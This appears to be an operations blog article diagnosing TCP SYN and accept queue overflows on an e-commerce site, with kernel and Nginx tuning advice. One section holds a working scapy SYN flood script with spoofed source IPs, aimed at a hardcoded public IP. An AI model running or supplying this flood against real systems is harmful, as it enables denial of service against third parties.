Diagnosing and Fixing TCP SYN Queue Overflows that Crash E‑commerce Sites
This article walks through a real‑world incident where an e‑commerce site suffered intermittent outages due to TCP SYN and accept queue overflows, explains the underlying handshake mechanics, shows how kernel and Nginx parameters can be tuned, and provides Python scripts for testing and SYN‑flood simulation.
Problem description: the monitoring system reported intermittent inaccessibility of the e‑commerce homepage and other pages; security and traffic metrics looked normal, and a server reboot only temporarily resolved the issue.
Preliminary judgment: check device and network interface errors (using cat /proc/net/dev and ifconfig), and observe socket overflows and dropped sockets (e.g., netstat -s | grep -i listen).
Observation: SYN socket overflow and dropped sockets increased sharply.
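These counters can also be pulled out programmatically for monitoring. A minimal sketch, assuming the counter wording that `netstat -s` prints on typical Linux kernels (the sample numbers below are illustrative, not from the incident):

```python
import re

def parse_listen_drops(netstat_s_output: str) -> dict:
    """Extract listen-queue overflow/drop counters from `netstat -s` text."""
    counters = {}
    overflow = re.search(r'(\d+) times the listen queue of a socket overflowed',
                         netstat_s_output)
    drops = re.search(r'(\d+) SYNs to LISTEN sockets dropped',
                      netstat_s_output)
    if overflow:
        counters['listen_overflows'] = int(overflow.group(1))
    if drops:
        counters['listen_drops'] = int(drops.group(1))
    return counters

# Illustrative sample of the relevant `netstat -s` lines.
sample = """\
    4820 times the listen queue of a socket overflowed
    4820 SYNs to LISTEN sockets dropped
"""
print(parse_listen_drops(sample))
```

Polling this on an interval and alerting when the counters grow is a cheap early-warning signal for accept-queue pressure.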
Check kernel sysctl parameters: net.ipv4.tcp_syncookies, net.ipv4.tcp_max_syn_backlog, and net.core.somaxconn.
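Each of these sysctls is exposed as a file under /proc/sys, so they can be checked from a script. A small sketch (the helper names are my own; values fall back to a default on non-Linux systems where the files do not exist):

```python
def sysctl_path(name: str) -> str:
    """Map a dotted sysctl name to its /proc/sys file path."""
    return '/proc/sys/' + name.replace('.', '/')

def read_sysctl(name: str, default=None):
    """Read a sysctl value as a string, returning `default` if unavailable."""
    try:
        with open(sysctl_path(name)) as f:
            return f.read().strip()
    except OSError:
        return default

for name in ('net.ipv4.tcp_syncookies',
             'net.ipv4.tcp_max_syn_backlog',
             'net.core.somaxconn'):
    print(name, '=', read_sysctl(name, 'unavailable'))
```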
Inspect SELinux and NetworkManager status; disable if necessary.
Verify the timestamp and reuse settings (net.ipv4.tcp_timestamps, net.ipv4.tcp_tw_reuse), and whether TIME_WAIT recycling (tcp_tw_recycle) is enabled.
Deep analysis: during the TCP three‑way handshake, the server first places the connection in the half‑connection (SYN) queue; when the full‑connection (accept) queue is full, the kernel follows the tcp_abort_on_overflow setting. With the default value 0, the server discards the client's ACK, leaving the connection incomplete.
<code># cat /proc/sys/net/ipv4/tcp_abort_on_overflow
0
</code>
Changing tcp_abort_on_overflow to 1 makes the server send a reset (RST) packet when the accept queue is full, which surfaces as "connection reset by peer" in the web logs, confirming the root cause.
Kernel and Nginx tuning performed:
Linux kernel parameters:
net.ipv4.tcp_syncookies = 1
net.ipv4.tcp_max_syn_backlog = 16384
net.core.somaxconn = 16384
Nginx configuration (backlog parameter on the listen directive): backlog=32768;
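One detail worth remembering: the backlog an application passes to listen() is silently capped by the kernel at net.core.somaxconn, so raising the Nginx backlog without raising somaxconn has no effect. A quick sketch of the application-side view (socket.SOMAXCONN reflects a compile-time constant, not necessarily the live sysctl value):

```python
import socket

srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
srv.bind(('127.0.0.1', 0))   # ephemeral port, just for illustration
srv.listen(32768)            # the kernel truncates this to net.core.somaxconn
print('compile-time SOMAXCONN:', socket.SOMAXCONN)
srv.close()
```

This is why the tuning above raises somaxconn and the Nginx backlog together.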
Python multithreaded stress test (no new issues found):
<code>import requests
from bs4 import BeautifulSoup
from concurrent.futures import ThreadPoolExecutor

url = 'https://www.wuage.com/'
response = requests.get(url)
soup = BeautifulSoup(response.text, 'html.parser')

# Fetch every link on the homepage concurrently with 20 worker threads.
with ThreadPoolExecutor(max_workers=20) as ex:
    for each_a_tag in soup.find_all('a'):
        href = each_a_tag.get('href')
        if not href or not href.startswith('http'):
            continue  # skip anchors without an absolute URL
        try:
            ex.submit(requests.get, href)
        except Exception as err:
            print('return error msg: ' + str(err))
</code>
Understanding TCP handshake queues
The diagram shows two queues: the SYN (half‑connection) queue and the accept (full‑connection) queue. During the first handshake step, the server places the SYN in the half‑connection queue and replies with SYN+ACK. In the third step, if the accept queue is not full, the server moves the entry to the accept queue; otherwise it follows the tcp_abort_on_overflow policy.
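The flow just described can be captured in a toy simulation. This is purely illustrative: the class and queue sizes are hypothetical stand-ins for tcp_max_syn_backlog, somaxconn, and the tcp_abort_on_overflow flag, not real kernel behavior:

```python
from collections import deque

class Listener:
    def __init__(self, syn_backlog=3, accept_backlog=2, abort_on_overflow=False):
        self.syn_queue = deque()       # half-open connections (SYN received)
        self.accept_queue = deque()    # established, waiting for accept()
        self.syn_backlog = syn_backlog
        self.accept_backlog = accept_backlog
        self.abort_on_overflow = abort_on_overflow

    def on_syn(self, client):
        if len(self.syn_queue) >= self.syn_backlog:
            return 'SYN dropped'       # without syncookies the SYN is lost
        self.syn_queue.append(client)
        return 'SYN+ACK sent'

    def on_ack(self, client):
        if client not in self.syn_queue:
            return 'ignored'
        if len(self.accept_queue) >= self.accept_backlog:
            # tcp_abort_on_overflow=1 -> RST; =0 -> drop the ACK silently
            return 'RST' if self.abort_on_overflow else 'ACK dropped'
        self.syn_queue.remove(client)
        self.accept_queue.append(client)
        return 'established'

srv = Listener()
for c in ('c1', 'c2', 'c3'):
    srv.on_syn(c)
print(srv.on_ack('c1'))   # established
print(srv.on_ack('c2'))   # established
print(srv.on_ack('c3'))   # accept queue full -> ACK dropped
```

With abort_on_overflow set to True, the third client would get an immediate RST instead, matching the "connection reset by peer" symptom from the incident.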
If the accept queue is full and tcp_abort_on_overflow is 0, the server may resend SYN+ACK, and a client with a short connection timeout will likely fail.
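Those SYN+ACK retransmissions back off exponentially, governed by net.ipv4.tcp_synack_retries (default 5 on Linux). A quick sketch of the timeline, assuming the textbook 1-second initial retransmission timeout and ignoring RTO jitter:

```python
def synack_timeline(retries=5, initial_rto=1.0):
    """Elapsed seconds of each SYN+ACK (re)transmission, plus total give-up time."""
    times, t, rto = [0.0], 0.0, initial_rto
    for _ in range(retries):
        t += rto            # wait one RTO, then retransmit
        times.append(t)
        rto *= 2            # exponential backoff doubles the RTO each time
    return times, t + rto   # abandoned one final RTO after the last retry

times, total = synack_timeline()
print('transmissions at:', times)   # [0.0, 1.0, 3.0, 7.0, 15.0, 31.0]
print('gives up after:', total, 's')
```

Under these assumptions a half-open entry lingers for about a minute, so a client that times out after a few seconds will have long since given up, which is exactly the failure mode described above.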
SYN Flood (DoS) attack example
<code>import random
from concurrent.futures import ThreadPoolExecutor
from scapy.all import IP, TCP, send

def synFlood(tgt, dPort):
    # Spoofed source addresses: the victim's SYN+ACK replies go nowhere,
    # so half-open entries pile up in its SYN queue.
    srcList = ['11.1.1.2', '22.1.1.102', '33.1.1.2', '125.130.5.199']
    for sPort in range(1024, 65535):
        index = random.randrange(len(srcList))
        ipLayer = IP(src=srcList[index], dst=tgt)
        tcpLayer = TCP(sport=sPort, dport=dPort, flags='S')
        packet = ipLayer / tcpLayer
        send(packet, verbose=False)

tgt = '139.196.251.198'
dPort = 443
print(tgt)

# A small pool suffices; the errors are raised by the task, not by submit().
with ThreadPoolExecutor(max_workers=10) as ex:
    future = ex.submit(synFlood, tgt, dPort)
    try:
        future.result()
    except Exception as err:
        print('return error msg: ' + str(err))
</code>
The article emphasizes that TCP half‑connection and full‑connection queue issues are easy to overlook but critical, especially for short‑lived connections, and suggests building robust incident‑response mechanisms.
Efficient Ops
This public account is maintained by Xiaotianguo and friends, regularly publishing widely-read original technical articles. We focus on operations transformation and accompany you throughout your operations career, growing together happily.